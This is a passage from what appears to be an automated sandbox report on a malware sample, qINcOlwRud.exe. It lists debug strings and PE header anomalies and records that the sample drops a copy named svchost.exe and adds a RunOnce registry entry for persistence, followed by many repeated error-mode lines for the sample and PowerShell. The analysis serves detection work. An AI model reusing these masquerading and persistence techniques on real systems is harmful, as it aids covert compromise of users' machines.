            Source: Binary string: System.Xml.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Core.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: (P+pLC:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Users\user\Desktop\qINcOlwRud.PDB( source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: mscorlib.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Windows.Forms.pdb0 source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Drawing.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: mscorlib.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Core.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Xml.pdbD source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: qINcOlwRud.exeStatic PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
            Source: svchost.exe.0.drStatic PE information: real checksum: 0x9c7d should be: 0xbd49
            Source: qINcOlwRud.exeStatic PE information: real checksum: 0x9c7d should be: 0xbd49
            Source: C:\Users\user\Desktop\qINcOlwRud.exeCode function: 0_2_01176368 push eax; retf

            Persistence and Installation Behavior:

            barindex
            Drops PE files with benign system namesShow sources
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeJump to dropped file
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeJump to dropped file
            Source: C:\Users\user\Desktop\qINcOlwRud.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce KGpXzAMpWDmcnfKnkZdJaBfAImYJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce KGpXzAMpWDmcnfKnkZdJaBfAImYJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce KGpXzAMpWDmcnfKnkZdJaBfAImYJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce KGpXzAMpWDmcnfKnkZdJaBfAImYJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
